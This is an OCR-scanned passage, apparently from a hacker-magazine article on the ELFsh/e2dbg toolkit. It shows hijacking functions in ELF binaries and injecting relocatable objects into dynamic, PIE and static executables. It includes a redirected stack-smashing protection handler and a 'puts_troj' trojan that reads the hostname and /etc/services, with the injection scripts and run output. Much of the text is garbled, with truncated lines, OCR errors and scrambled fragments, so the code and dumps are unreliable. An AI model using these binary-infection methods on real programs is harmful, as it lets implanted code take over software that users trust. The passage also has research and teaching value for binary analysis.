lfsh_get_dynsymbol_name@dynsym.c:17> 
<elfsh_get_dynsymbol_by_name@dynsym.c:274> 
<elfsh_get_raw@section.c:691> 
<elfsh_get_dynsymbol_name@dynsym.c:17> 
Last 2 function(s) recalled 12 time(s) --- 
+ <elfsh_get_symbol_by_name@symbol.c:236> 

+ <elfsh_get_symtab@symbol.c:110> 

+ <elfsh_get_symbol_name@symbol.c:20> 
<elfsh_get_symbol_name@symbol.c:20> 

Last 1 function(s) recalled 114 time(s) -- 
+ <elfsh_hijack_function_by_name@hijack.c:25> 

+ <elfsh_setup_hooks@hooks.c:199> 

+ <elfsh_get_pagesize@hooks.c:783> 

+ <elfsh_get_archtype@hooks.c:624> 

+ <elfsh_get_arch@elf.c:179> 

+ <elfsh_copy_plt@altplt.c:525> 

+ <elfsh_static_file@elf.c:491> 

+ <elfsh_get_segment_by_type@pht.c:215> 

+ <elfsh_get_pht@pht.c:364> 

+ <elfsh_get_segment_type@pht.c:174> 

P] --[ <elfsh_get_segment_type@pht.c:174> 

Last 1 function(s) recalled 4 time(s) --- 
_get_arch@elf.c:179> 
<elfsh_get_arch@elf.c:179> 

Last 1 function(s) recalled 1 time(s) --- 
link_plt@altplt.c:121> 

+ <elfsh_get_archtype@hooks.c:624> 
fFsh_get_arch@elf.c:179> 
fFsh_relink_plt@altplt.c:121> 

--[ <elfsh_get_archtype@hooks.c:624> 

--- Last 3 function(s) recalled 1 time(s) --- 
+ <elfsh_get_elftype@hooks.c:662> 

+ <elfsh_get_objtype@elf.c:204> 

+ <elfsh_get_ostype@hooks.c:709> 

+ <elfsh_get_real_ostype@hooks.c:679> 


PD —— 


+ <elfsh 
Bl eo 


__EXEC 


loaded 


switching to STATIC mode 


./a.out_e2dbg 


Symbol not 


found 


wot tH 
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lfsh_get_interp@interp.c:41> 
lfsh_get_raw@section.c:691> 

--[ <elfsh_get_raw@section.c:691> 

--- Last 1 function(s) recalled 1 time(s) --- 
lfsh_get_section_by_name@section.c:168> 
lfsh_get_section_name@sht.c:474> 

--[ <elfsh_get_section_name@sht.c:474> 

--- Last 1 function(s) recalled 1 time(s) --- 
lfsh_get_symbol_by_name@symbol.c:236> 
lfsh_get_symtab@symbol.c:110> 
lfsh_get_symbol_name@symbol.c:20> 


<elfsh_get_symbol_by_name@symbol.c:253> 


--[ <elfsh_get_symbol_name@symbol.c:20> 
-—-- Last 1 function(s) recalled 114 time(s) - 
lfsh_is_pltentry@plt.c:73> 


<elfsh_is_pltentry@plt.c:77> 


lfsh_get_dynsymbol_by_name@dynsym.c:255> 
lfsh_get_dynsymtab@dynsym.c:87> 
lfsh —get_raw@section.c:691> 


--[ <elfsh_get_raw@section.c:691> 

--- Last 1 function(s) recalled 1 time(s) --- 
lfsh_get_dynsymbol_name@dynsym.c:17> 

--[ <elfsh_is_pltentry@plt.c:73> 

--[ <elfsh_get_dynsymbol_by_name@dynsym.c:255 
--[ <elfsh_get_dynsymtab@dynsym.c:87> 

—--[ <elfsh_get_raw@section.c:691> 

--[ <elfsh_get_dynsymbol_name@dynsym.c:17> 


= Last 5 function(s) recalled 1 time(s) --- 
lfsh_get_plt@plt.c:16> 
lfsh_is_plt@plt.c:49> 


lfsh_get_section_name@sht.c:474> 
lfsh_is_altplt@plt.c:62> 


--[ <e 
--[ <e 


-—-[ <elfsh_is_plt@plt.c:49> 

--[ <elfsh_get_section_name@sht.c:474> 

—-[ <elfsh_is_altplt@plt.c:62> 

--- Last 3 function(s) recalled 3 time(s) --- 
lfsh_get_anonymous_section@section.c:334> 
lfsh_get_raw@section.c:691> 

- <elfsh_is_plt@plt.c:49> 

--[ <elfsh_get_section_name@sht.c:474> 

-—-[ <elfsh_is_altplt@plt.c:62> 
lfsh_get_anonymous_section@section.c:334> 


lfsh_get_raw@section.c:691> 


-—--— Last 5 function(s) recalled 44 time(s) -- 
lfsh_get_arch@elf.c:179> 
--[ <elfsh_get_arch@elf.c:179> 

-—-- Last 1 function(s) recalled 1 time(s) --- 
lfsh_hijack_plt_ia32@ia32.c:258> 
lfsh_get_foffset_from_vaddr@raw.c:85> 


lfsh_get_pltentsz@plt.c:94> 

--[ <elfsh_get_arch@elf.c:179> 

--[ <elfsh_hijack_plt_ia32@ia32.c:258> 

--[ <elfsh_get_foffset_from_vaddr@raw.c:85> 
--[ <elfsh_get_pltentsz@plt.c:94> 

--- Last 4 function(s) recalled 1 time(s) --- 
lfsh_munprotect@runtime.c:97> 
lfsh_get_parent_section@section.c:380> 
lfsh_get_parent_segment@pht.c:304> 
lfsh_segment_is_readable@pht.c:14> 
lfsh_segment_is_writable@pht.c:21> 
lfsh_segment_is_executable@pht.c:28> 
lfsh_raw_write@raw.c:22> 
lfsh_get_parent_section_by_foffset@section.c:416> 
lfsh_get_sht@sht.c:159> 
lfsh_get_section_type@sht.c:887> 
lfsh_get_anonymous_section@section.c:334> 
lfsh_get_raw@section.c:691> 


lfsh_raw_write@raw.c:22> 


> 


Symbol not found 


Invalid NULL parameter 
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+ <elfsh_ 
+ <elfsh_ 
+ <elfsh_ 
+ <elfsh_ 
+ <elfsh_ 
+ <elfsh_ 
+ <elfsh_ 


*)] Funct 


+ <vm_pri 
“profile 
+ <vm_imp 
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get_parent_section_by_foffset@section.c:416> 
get_sht@sht.c:159> 
get_section_type@sht.c:887> 
get_anonymous_section@section.c:334> 
get_raw@section.c:691> 
get_pltentsz@plt.c:94> 

get_arch@elf.c:179> 


+ <elfsh_mprotect@runtime.c:135> 


ion puts redirected to addr OxB7FB6000 <myputs> 
nt_actual@loop.c:38> 


licit@implicit.c:91> 


[*] ./etr 


(e2dbg-0. 


[watt 


[e2dbg_ru 
[host] ma 
[host] ar 


First_pri 
Hijacked 

First_put 
Second_pr 
Hijacked 

Second_pu 
Hijacked 

LEGIT FUN 
legit fun 
elfsh@WTH 


Profiling disable 


elmem.esh sourcing -OK- 


65) continue 


Embedded ELF Debugger returns to the grave :...] 


n] returning to 0x08045139 
in argc 1 

gv[0] is : ./a.out_e2dbg 
ntf test 


puts !!! arg First_puts 
s 
intf test 
puts !!! arg 
ts 
puts !!! arg = LEGIT FUNC 
Cc 
c (test) ! 

$ 


Second_puts 


END DUMP 29 ========= 


Really cool. We hijacked 2 functions (puts and legit_func) using 
the 2 different (ALTPLT and CFLOW) techniques. For this, we 

did not have to inject an additional ET_REL file inside the 
ET_EXEC host, but we directly injected the hook module inside 
memory using mmap. 


We could have printed the SHT and PHT as well just after the 
ET_REL injection into memory. We keep track of all mapping 
when we inject such relocatable objects, so that we can 
eventually unmap them in the future or remap them later 


(e2dbg-0.65) s 

SECTION HEADER TABLE .::. SHT is not stripped] 

Object ./a.out_e2dbg] 

000] 0x00000000 -------— foff:00000 size:00308 
001] 0x08045134 a-x---- .elfsh.hooks foff:00308 size:00015 
002] 0x08046134 a-x -elfsh.extplt foff:04404 size:00032 
003] 0x08047134 a-x---—- .elfsh.altplt foff:08500 size:04096 
004] 0x08048134 a------ .interp foff:12596 size:00019 
005] 0x08048148 a -note.ABI-tag foff:12616 size:00032 
006] 0x08048168 a-----—-— -hash foff:12648 size:00064 
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007] Ox080481A8 a------— .dynsym foff:12712 size:00176 
008] 0x08048258 a------ .dynstr foff:12888 size:00112 
009] 0x080482C8 a------ -gnu.version foff:13000 size:00022 
010] 0x080482E0 a------ -gnu.version_r foff:13024 size:00032 
011] 0x08048300 a------ .rel.dyn fFoff:13056 size:00016 
012] 0x08048310 a------ -rel.plt foff:13072 size:00056 
013] 0x08048348 a-x---- .init foff:13128 size:00023 
014] 0x08048360 a-x---- .plt foff:13152 size:00128 
015] 0x08048400 a-x---- .text foff:13312 size:00800 
016] 0x08048720 a-x---- .fini foff:14112 size:00027 
017] 0Ox0804873C a------ .rodata foff:14140 size:00185 
018] Ox080487F8 a------— .eh_frame foff:14328 size:00004 
019] Ox080497FC aw-----— .ctors foff:14332 size:00008 
020] 0x08049804 aw-----— .dtors foff:14340 size:00008 
021] 0x0804980C aw-----— yer foff:14348 size:00004 
022] 0x08049810 aw----- -dynamic foff:14352 size:00200 
023] 0x080498D8 aw----— got foff:14552 size:00004 
024] 0x080498DC aw----- -got.plt foff:14556 size:00040 
025] 0x08049904 aw-----— .data foff:14596 size:00012 
026] 0x08049910 aw-----— -bss foff:14608 size:00008 
027] 0x08049918 aw----- .elfsh.altgot foff:14616 size:00044 
028] 0x08049968 aw----- .elfsh.dynsym foff:14696 size:00192 
029] Ox08049AC8 aw----- .elfsh.dynstr fFoff:15048 size:00122 
030] Ox08049BA8 aw----- .elfsh.reldyn foff:15272 size:00016 
031] 0x08049BB8 aw----- -elfsh.relplt foff:15288 size:00064 
032] 0x00000000 -—------ .comment foff:15400 size:00665 
033] 0x00000000 ------- .debug_aranges foff:16072 size:00120 
034] 0x00000000 -—------ .debug_pubnames foff:16192 size:00042 
035] 0x00000000 -------— .debug_info foff:16234 size:06904 
036] 0x00000000 -------— .debug_abbrev foff:23138 size:00503 
037] 0x00000000 -—------— .debug_line fFoff:23641 size:00967 
038] O0x00000000 ------- .debug_frame fFoff:24608 size:00076 
039] 0x00000000 ---ms-- .debug_str fFoff:24684 size:08075 
040] 0x00000000 -—------ .debug_macinfo fFoff:32759 size:29295 
041] 0x00000000 -------— .shstrtab foff:62054 size:00496 
042] 0x00000000 -------— .symtab foff:64473 size:02256 
043] 0x00000000 -------— .strtab foff:66729 size:01665 
044] 0x40019000 aw----- myputs.o.bss Foff:68394 size:04096 
045] 0x00000000 -—------ .elfsh.rpht fFoff:72493 size:04096 
046] Ox4001A000 a-x---- myputs.o.text foff:76589 size:04096 
047] O0x4001B000 a--ms-- myputs.o.rodata.strl1.1 fFoff:80685 size:04096 
(e2dbg-0.65) p 

Program Header Table .::. PHT] 

Object ./a.out_e2dbg] 

00] 0x08045034 -> 0x08045134 r-x memsz(00256) filesz (00256) 

O01] 0x08048134 -> 0x08048147 r-- memsz(00019) filesz (00019) 

02] 0x08045000 —-> Ox080487FC r-x memsz (14332) filesz (14332) 

03] Ox080497FC -—> 0x08049C30 rw- memsz(01076) filesz (01068) 

04] 0x08049810 -—> 0x080498D8 rw- memsz(00200) filesz (00200) 

05] 0x08048148 -—> 0x08048168 r-—- memsz(00032) filesz (00032) 

06] O0x00000000 -> 0x00000000 rw- memsz(00000) filesz (00000) 

07] O0x00000000 -> 0x00000000 --- memsz(00000) filesz (00000) 

SHT correlation] 

Object ./a.out_e2dbg] 

*] SHT is not stripped 

00] PT_PHDR 

01] PT_INTERP .interp 

02] PT_LOAD -elfsh.hooks .elfsh.extplt .elfsh.altplt .interp 


-note.ABI-tag .hash .dynsym .dynstr .gnu.version 
-gnu.version_r .rel.dyn .rel.plt .init ~.plt 
.text .fini .rodata .eh_frame 

[03] PT_LOAD -ctors .dtors .jcr .dynamic .got .got.plt .data 
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04) PT_ 
05) PT_ 
06] PT_ 
07] PT_ 


Object 


*] SHT 
00] 
01] 
02] 


PT 


(e2dbg-0 


PT 
PR 
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.bss 


DYNAMIC 
NOTE 
GNU_STACK 
PAX_FLAGS 


Runtime Program Header Table 


Object ./a.out_e2dbg] 
00] 0x40019000 
01] 0x4001A000 
02] 0x4001B000 


SHT correlation] 


./a.out_e2dbg] 


is not stripped 


Our algorithm 
a new PT_LOAD 
(Runtime PHT) 


pages. 


runtime 
since all zone 
rights. Howeve 
on the newly i 


—> 0x4001A000 
-—> 0x4001B000 
—> 0x4001C000 


[This table has no 
but that avoid to 
memory areas. 


09:43:45 2017 


rw- memsz 
r-xX MeMszZ 
r-xX MEeEMSZ 


__ LOAD myputs.o.bss 
LOAD myputs.o.text 
LOAD myputs.o.rodata. 
65) 
= BEGIN DUMP 30 ========= 


is not reall 


-elfsh.altgot 
.elfsh.reldyn 
.dynamic 

-note.ABI-tag 


37 


-elfsh.dynsym .elfsh.dynstr 


-elfsh.relplt 


RPHT ] 


(4096) filesz (4096) 
(4096) filesz (4096) 
(4096) filesz (4096) 
Stel 2. 


y optimized since it allocates 


by section. Her 
which handle th 
lega 
xtend th 


, we created a new table RPHT 
e list of all runtime injected 
1 existance in the ELF file, 
real PHT with additional 


The tec 
s are al 
r, 
njected 


hnique does not break Pax 


located using the strict necessary 

if you want to redirect existing functions 
functions from myputs.o, 
will have to change some code in runtime, 


then you 
and then it 


becomes necessary to disable mprotect option to avoid 


breaking Pax. 


REL relocation into ET_DYN 

We ported the ET_REL injection 
ET_DYN files. Th 

a relative addr 


non-mandatory i 


Let’s see what 


EGIN DUMP 31 


elfsh@WTH S$ file main 


main: 
stripped 


elfsh@WTH $ 
Ox800008c8 main (argc=0xbfa238d0, 


ELF 32-bit LSB shared object, 


./main 


auxv=O0xb 


nformation such 


happens on this 


£a23874) 


biggest difference is that 
ss space ondisk. Of course, 
have no effect on our algorithms and we dont 


Intel 80386, 


argv=Oxbfa2387c, 
__guard=0xb7ef4148 


and the 


EXTPLT technique to 
ET_DYN files have 
stripped binaries 
need any 

as debug sections or anything 


(it may be obvious but some peoples really asked this). 


[DYN host file: 


version 1 (SYSV), 


envp=0xbfa23878, 
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ssp-all (Stack) Triggering an overflow by copying [20] of data into [10] 
of space 

main: stack smashing attack in function main() 

Aborted 


elfsh@WTH S$ ./main AAAAA 

Ox800008c8 main (argc=0xbf898e40, argv=O0xbf898dec, envp=0xbf898de8, 
auxv=Oxbf898de4) _ guard=0xb7f6a148 

ssp-all (Stack) Copying [5] of data into [10] of space 


elfsh@WTH $ ./main AAAAAAAAAAAAAAAAAAAAAAAAAAA 

Ox800008c8 main (argc=0xbfd3c8e0, argv=Oxbfd3c88c, envp=0xbfd3c888, 
auxv=Oxbfd3c884) _ guard=0xb7f0b148 

ssp-all (Stack) Copying [27] of data into [10] of space 

main: stack smashing attack in function main() 

Aborted 


========= FND DUMP 31 ========= 


For the sake of fun, we decided to study in priority the 
hardened gentoo binaries [11] . Those comes with PIE (Position 
Independant Executable) and SSP (Stack Smashing Protection) 
built in. It does not change a line of our algorithm. Here 

are some tests done on a stack smashing protected binary 

with an overflow in the first parameter, triggering the 

stack smashing handler. We will redirect that handler 

to show that it is a normal function that use classical 


PLT mechanisms. 


This is the code that we are going to inject 


========= BEGIN DUMP 32 ========= 


elfsh@WTH $ cat simple.c 
#include <stdio.h> 
#include <stdlib.h> 
#include <unistd.h> 


Lite fake_main(int argc, char **argv) 
{ 
old_printf("I am the main function, I have %d argc and my " 
"argv is %08X yupeelala \n", 
argc, argv); 


write(1, "fake_main is calling write ! \n", 30); 


old_main(argc, argv); 


return (0); 


} 


char* fake_strcpy(char *dst, char *src) 


{ 


printf ("The fucker wants to copy %s at address %08X \n", src, dst); 


return ((char *) old_strcpy(dst, src)); 
} 
void fake_stack_smash_handler(char func[], int damaged) 
{ 
static int i = 0; 
printf("calling printf from stack smashing handler %u\n", itt); 
if (i>3) 
old stack_smash_handler (func, damaged); 
else 


printf("Same player play again [damaged = %08X] \n", damaged) ; 
printf("A second (%d) printf from the handler \n", 2); 
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int fake_libc_start_main(void *one, void *two, void *three, void *four, 
void *five, void *six, void *seven) 


{ 


static int i = 0; 


old_printf ("fake_libc_start_main \n"); 

printf ("start_main has been run %u \n", itt); 

return (old libc_start_main(one, two, three, four, 
five, six, seven)); 


ND DUMP 32 ========= 


tH 


The elfsh script that allow for the modification is 


========= BEGIN DUMP 33 ========= 


elfsh@WTH $ cat relinject.esh 
'l./../../vm/elfsh 


load main 
load simple.o 


reladd 1 2 

redir main fake_main 

redir stack_smash_handler fake_stack_smash_handler 
redir libc_start_main fake_libc_start_main 


redir strcpy fake_strcpy 
save fake_main 
quit 


========= FND DUMP 33 ========= 


Now let’s see this in action ! 


=s======== BEGIN DUMP 34 ========= 
elfsh@WTH $ ./relinject.esh 


The ELF shell 0.65 (32 bits built) 


This software is under the General Public License V.2 
Please visit http://www.gnu.org 


“load main 


[*] Sun Jul 31 17:24:20 2005 - New object main loaded 


“load simple.o 


[*] Sun Jul 31 17:24:20 2005 - New object simple.o loaded 


“reladd 1 2 


[*] ET_REL simple.o injected succesfully in ET_DYN main 


“redir main fake_main 


[*] Function main redirected to addr 0x00005154 <fake_main> 


9.txt Wed Apr 26 09:43:45 2017 40 


~“redir stack_smash_handler fake_stack_smash_handler 


[*] Function stack_smash_handler redirected to addr 
0x00005203 <fake_stack_smash_handler> 


~“redir libc_start_main fake_libc_start_main 


[*] Function libc_start_main redirected to addr 
0x00005281 <fake_libc_start_main> 


“redir strcpy fake_strcpy 

[*] Function strcpy redirected to addr 0x000051BD <fake_strcpy> 
“save fake_main 

[*] Object fake_main saved successfully 

“quit 

[*] Unloading object 1 (simple.o) 


[*] Unloading object 2 (main) * 
Bye -:: The ELF shell 0.65 


========= FND DUMP 34 ========= 


What about the result ? 


========= BEGIN DUMP 35 ========= 


elfsh@WTH S$ ./fake_main 

fake_libc_start_main 

start_main has been run 0 

I am the main function, I have 1 argc and my argv is BF9A6F54 yupeelala 

fake_main is calling write ! 

Ox800068c8 main (argc=0xbf9abe80, argv=Oxbf9abe2c, envp=0xbf9abe28, 
auxv=Oxbf9a6e24) _ guard=0xb7f£78148 

ssp-all (Stack) Triggering an overflow by copying [20] of data into [10] 

of space 

The fucker wants to copy 01234567890123456789 at address BF9A6E50 

calling printf from stack smashing handler 0 

Same player play again [damaged = 39383736] 

A second (2) printf from the handler 


elfsh@WTH $ ./fake_main AAAA 

fake_libc_start_main 

start_main has been run 0 

I am the main function, I have 2 argc and my argv is BF83A164 yupeelala 

fake_main is calling write ! 

Ox800068c8 main (argc=0xbf83a090, argv=Oxbf83a03c, envp=0xbf83a038, 
auxv=O0xbf83a034) _ guard=0xb7f£09148 

ssp-all (Stack) Copying [4] of data into [10] of space 

The fucker wants to copy AAAA at address BF83A060 


elfsh@WTH $ ./fake_main AAAAAAAAAAAAAAA 

fake_libc_start_main 

start_main has been run 0 

I am the main function, I have 2 argc and my argv is BF8C7F24 yupeelala 

fake_main is calling write ! 

Ox800068c8 main (argc=0xbf8c7e50, argv=Oxbf8c7dfc, envp=O0xbf8c7df8, 
auxv=Oxbf8c7df4) __guard=0xb7f£97148 

ssp-all (Stack) Copying [15] of data into [10] of space 

The fucker wants to copy AAAAAAAAAAAAAAA at address BF8C7E20 


========= FND DUMP 35 ========= 
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No problem there : strcpy, main, libc_start_main and 
stack_smash_handler are redirected on our own routines 

as the output shows. We also call write that was not available 

in the original binary, which show that EXTPLT also works on 

ET_DYN objects, the cool stuff beeing that it worked without 

any modification. 


In the current releas (0.65rcl) there is a limitation on ET_DYN 
however. We have to avoid non-initialized variables because 
that would add some entries in relocation tables. This is not 
a problem to add some since we also copy .rel.got (rel.dyn) in 
EXTPLT on ET_DYN, but it is not implemented for now. 


Extending static executables 


Now we would like to be able to debug static binary the same way 
we do for dynamic ones. Since we cannot inject e2dbg using 
DT_NEEDED dependances on static binaries, the idea is to inject 
e2dbg as ET_REL into ET_EXEC since it is possible on static 
binaries. E2dbg as many more dependancies than a simple host.c 
program. Th xtended idea is to inject the missing part of 
static libraries when it is necessary. 


We have to resolve dependancies on-the-fly while ET_REL injection 
is performed. For that we will use a simple recursive algorithm 
on the existing relocation code : when a symbol is not found 

at relocation time, either it is a old_* symbol so it is delayed 
in a second stage relocation time (Indeed, old symbols appears 

at redirection time, which is done after the injection of the 
ET_REL file so we miss that symbol at first stage), or the 
function symbol is definitely unknown and we need to add 
information so that the rtld can resolve it as well. 


To be able to find the suitable ET_REL to inject, ELFsh load all 
the ET_REL from static library (.a) then the resolution is done 
using this pool of binaries. The workspace feature of elfsh is 
quite useful for this, when sessions are performed on more than 
a thousand of ET_EXEC ELF files at a time (after extracting 
modules from libc.a and others static librairies, for instance). 


Circular dependancies are solved by using second stage relocation 
when the required symbol is in a file that is being injected after 
the current file. The same second stage relocation mechanism 

is used when we need to relocate ET_REL objects that use OLD 
symbols. Since OLD symbols are injected at redirection time and 

ET REL files should be injected before (so that we can use 
functions from the ET_REL object as hook functions), we do not 
have OLD symbols at relocation time. The second stage relocation 
is then triggered at save time (for on disk modifications) or 
recursively solved when injecting multiple ET_REL with circular 
relocation dependances. 


A problem is remaining, as for now we had one PT_LOAD by injected 
section, we quickly reach more than 500 PT_LOAD. This seems to be 
a bit too much for a regular ELF static file. We need to improve 
the PT_LOAD allocation mechanism so that we can inject bigger 
extension to such host binaries. 


This technique provide the same features as EXTPLT but for static 
binaries : we can inject what we want (regardless of what the host 
binary contains). 
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So here is a smaller working example: 


========= BEFCIN DUMP 36 ========= 


elfsh@WTH S$ cat host.c 
include <stdio.h> 
include <stdlib.h> 
include <unistd.h> 


int legit_func(char *str) 


puts ("legit func !"); 
return (0); 


} 
int main() 


{ 


char *str; 

char buff[BUFSIZ]; 
read(0, buff, BUFSIZ-1); 
puts ("First_puts"); 

puts ("Second_puts"); 
fflush(stdout); 


legit_func ("test"); 


return (0); 


} 


elfsh@WTH S$ file a.out 
a.out: ELF 32-bit LSB executable, Intel 80386, statically linked, 
not stripped 


elfsh@WTH $ ./a.out 


First_puts 
Second_puts 
legit func ! 


ts 


ND DUMP 36 ========= 


The injected file source code is as follow 


========= BEGIN DUMP 37 ========= 


elfsh@WTH S$ cat rel2.c 
include <stdio.h> 
include <stdlib.h> 
include <unistd.h> 
include <string.h> 
include <netdb.h> 


int glvar_testreloc = 42; 
int glvar_testreloc_bss; 
char glvar_testreloc_bss2; 
short glvar_testreloc_bss3; 
Int hook_func(char *str) 


int sd; 
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printf("hook func %s !\n", str); 


return (old_legit_func(str)); 


int puts_troj(char *str) 
{ 

int local = 1; 

char *str2; 

int fd; 


char name[16]; 
void *a; 


str2 = malloc(10); 
Astr2 = '2'; 
*(str2 + 1) = 0x00; 


glvar_testreloc_bss = 43; 
glvar_testreloc_bss2 = 44; 
glvar_testreloc_bss3 


ll 
ws 
ol 

~ 


memset (name, 0, 16); 


printf("Trojan injected ET_REL takes control now " 
"([$s:%s:%u:%u: Shhu:Shu:%u] \n", 

str2, str, 

glvar_testreloc, 

glvar_testreloc_bss, 

glvar_testreloc_bss2, 

glvar_testreloc_bss3, 

local); 


free(str2); 


gethostname (name, 15); 


fe) 


printf ("hostname : %s\n", name); 


printf ("printf called from puts_troj [%s] \n", str); 


fd = open("/etc/services", 0, O_RDONLY) ; 


if (fd) 
{ 
if ((a = mmap(0, 100, PROT_READ, MAP_PRIVATE, fd, 0)) 


perror("mmap"); 
close (fd); 
printf("mmap failed : fd: %d\n", fd); 


return (-1); 
} 
printf ("-=-=-=-=-=- BEGIN /etc/services %d 
printf("host : %.60s\n", (char *) a); 
printf ("-=-=-=-=-=- END /etc/services 3d 
printf ("mmap succeed fd : %d\n", fd); 
close (fd); 


old_puts (str); 
fflush(stdout); 
return (0); 


========= END DUMP 37 ========= 


Natt, 


\n", 


fd); 


fd); 


9.txt Wed Apr 26 09:43:45 2017 44 


The load_lib.esh script, generated using a small bash 
script, looks like this 


========= BEGIN DUMP 38 ========= 


elfsh@WTH S$ head -n 10 load_lib.esh 
!../../../vm/elfsh 
load libc/init-first.o 
load libc/libc-start.o 
load libc/sysdep.o 
load libc/version.o 
load libc/check_fds.o 
load libc/libc-tls.o 
load libc/elf-init.o 
load libc/dso_handle.o 
load libc/errno.o 


========= END DUMP 38 ========= 


Here is the injection ELFsh script: 


========= BEGIN DUMP 39 ========= 


elfsh@WTH $ cat relinject.esh 
#!../../../vm/elfsh 


exec gcc -g3 -static host.c 
exec gcc -g3 -static rel2.c -c 


load a.out 
load rel2.o 


source ./load_lib.esh 
reladd 1 2 


redir puts puts_troj 
redir legit_func hook_func 


save fake_aout 


========= FND DUMP 39 ========= 


Stripped output of the injection 


=s======== BEGIN DUMP 40 ========= 
elfsh@WTH $ ./relinject.esh 


The ELF shell 0.65 (32 bits built) 


This software is under the General Public License V.2 
Please visit http://www.gnu.org 


“exec gcc -g3 -static host.c 
[*] Command executed successfully 
“exec gcc -g3 -static rel2.c -c 


[*] Command executed successfully 
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load a.out 


2005 


2005 


2005 


2005 


2005 


-J] 


New object 


45 


a.out loaded 


New object 


ject 


ject 


ject 


[*] Sun Jul 31 16:37:32 2005 
“load rel2.o 
[*] Sun Jul 31 16:37:32 
~source ./load_lib.esh 
“load libc/init-first.o 
*] Sun Jul 31 16:37:33 
~load libc/libc-start.o 
*)] Sun Jul 31 16:37:33 
~load libc/sysdep.o 
*] Sun Jul 31 16:37:33 
~load libc/version.o 
*] Sun Jul 31 16:37:33 

1414 files later 
*] ./load_lib.esh sourcing -OK- 
“reladd 1 2 


[*] 


KT 


“redir puts puts_troj 


[*] 


ject 


_REL rel2.o injected succesfully in 


rel2.o loaded 


libc/init-first.o loaded 


libc/libc-start.o loaded 


libc/sysdep.o loaded 


libc/version.o loaded 


ET_EXEC a.out 


Function puts redirected to addr 0x080B7026 <puts_troj> 


“redir legit_func hook_func 


eas 


Function legit_func redirected to addr 0x080B7000 <hook_func> 


“save fake_aout 


[*] 


Object fake_aout 


“quit 

[*] Un 
be ).-Un 
[*] Un 
[*] Un 


loading object 
loading object 
loading object 
loading object 


Bye 


SSoascea= BEGIN 


elfsh@WTH $ 


Trojan injected 


hostname : WTH 
printf called 


END DUMP 40 


mw wN PF 


1416 files later 


-:: The 


DUMP 41 


./fake_aout 


Se ee ee 


1) 


Does it works ? 


from puts_troj 


ELF shell 0.65 


[First_pu 


saved successfully 


ET REL takes control now 


ts] 


libpthreadnonshared/pthread_atfork.oS) 
libpthread/ptcleanup.o) 
libpthread/pthread_atfork.o) 
libpthread/old_pthread_atfork.o) 


[Z:First_puts:42:43:44:45:1] 


—-=-=-=-=-=- BEGIN /etc/services 3 
# /etc/services 


Network services, 


Internet style 
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END /etc/services 3 

mmap succeed fd: 3 

First_puts 

Trojan injected ET_REL takes control now 
hostname WTH 
printf called from puts_troj 


[Z:Second_puts:42:43:44:45:1] 


[Second_puts] 


—=-=-=-=-=-— BEGIN /etc/services 3 


# /etc/services 


Network services, Internet style 


END /etc/services 3 


mmap succeed fd: 3 

Second_puts 

hook func test ! 

Trojan injected ET_REL takes control now 
hostname WTH 
printf called from puts_troj [legit func 


[Z: legit func !:42:43:44:45:1] 


ti 


—=-=-=-=-=-— BEGIN /etc/services 3 


# /etc/services 


Network services, Internet style 


END /etc/services 3 


mmap succeed fd: 3 
legit func ! 
END DUMP 41 


Yes, 
file 


========= BEGIN DUMP 42 


It’s working. Now have a look at the fake_aout static 


elfsh@WTH $ ../../../vm/elfsh -f ./fake_aout -s 

*] Object ./fake_aout has been loaded (O_RDONLY) 

SECTION HEADER TABLE SHT is not stripped] 

Object ./fake_aout] 

000] 0x00000000 -—------ fFoff:000000 sz:00000 
001] Ox080480D4 a -note.ABI-tag Foff:069844 sz:00032 
002] 0x08048100 a-x---- .init foff:069888 sz:00023 
003] 0x08048120 a-x---- .text Foff:69920 sz:347364 
004] Ox0809CE10 a-x---- __libc_freeres_fn fFoff£:417296 sz:02222 
005] Ox0809D6CO a-x---- .fini fFoff:419520 sz:00029 
006] Ox0809D6E0 a------ .rodata fFoff:419552 sz:88238 
007] Ox080B2F90 a------ __libc_atexit fFoff:507792 sz:00004 
008] Ox080B2F94 a------ __libc_subfreeres fFoff:507796 sz:00036 
009] Ox080B2FB8 a------ .eh_frame fFoff:507832 sz:03556 
010] Ox080B4000 aw----- .ctors foff:512000 sz:00012 
011] Ox080B400C aw----- .dtors foff:512012 sz:00012 
012] 0x080B4018 aw----- GE fFoff:512024 sz:00004 
013] Ox080B401C aw----- .data.rel.ro Foff:512028 sz:00044 
014] 0x080B4048 aw----- -got foff:512072 sz:00004 
015] Ox080B404C aw-----— -got.plt Foff:512076 sz:00012 
016] Ox080B4060 aw----- .data fFoff:512096 sz:03284 
017] Ox080B4D40 aw----- .bss Foff:515380 sz:04736 
018] Ox080B5FCO aw----- __libc_freeres_ptrs fFoff:520116 sz:00024 
019] Ox080B6000 aw----- rel2.o.bss Foff:520192 sz:04096 
020] Ox080B7000 a-x---- rel2.o.text fFoff:524288 sz:04096 
021] Ox080B8000 aw----- rel2.o.data Foff:528384 sz:00004 
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022] 0x080B9000 a------ rel2.o.rodata Foff:532480 sz:04096 
023] OxO080BA000 a-x---- .elfsh.hooks Foff:536576 sz:00032 
024] Ox080BBO00 aw----- libc/printf.o.bss Foff:540672 sz:04096 
025] Ox080BCO00 a-x---- libc/printf.o.text foff:544768 sz:04096 
026] Ox080BD000 aw----- libc/gethostname.o.bss fFoff:548864 sz:04096 
027] OxO080BE000 a-x---- libc/gethostname.o.text fFoff:552960 sz:04096 
028] Ox080BF000 aw----- libc/perror.o.bss Foff:557056 sz:04096 
029] 0x080C0000 a-x---- libc/perror.o.text fFoff:561152 sz:04096 
030] 0x080C1000 a--ms-- libc/perror.o.rodata.strl.1 foff:565248 sz:04096 
031] 0x080C2000 a--ms-- libc/perror.o.rodata.str4.4 foff:569344 sz:04096 
032] O0x080C3000 aw----- libc/dup.o.bss fFoff:573440 sz:04096 
033] 0x080C4000 a-x---- libc/dup.o.text foff:577536 sz:04096 
034] 0x080C5000 aw----- libc/iofdopen.o.bss foff:581632 sz:04096 
035] 0x00000000 -—------ .comment Foff:585680 sz:20400 
036] 0x080C6000 a-x---- libc/iofdopen.o.text foff:585728 sz:04096 
037] Ox00000000 ------- .debug_aranges foff:606084 sz:00136 
038] O0x00000000 ------- debug_pubnames Foff:606220 sz:00042 
039] 0x00000000 -------— debug_info fFoff:606262 sz:01600 
040] 0x00000000 -------— debug_abbrev foff:607862 sz:00298 
041] 0x00000000 -------— debug_line foff:608160 sz:00965 
042] 0x00000000 -------— debug_frame fFoff:609128 sz:00068 
043] 0x00000000 -------— debug_str fFoff:609196 sz:00022 
044] 0x00000000 ------- .debug_macinfo fFoff:609218 sz:28414 
045] 0x00000000 -------— .shstrtab Foff:637632 sz:00632 
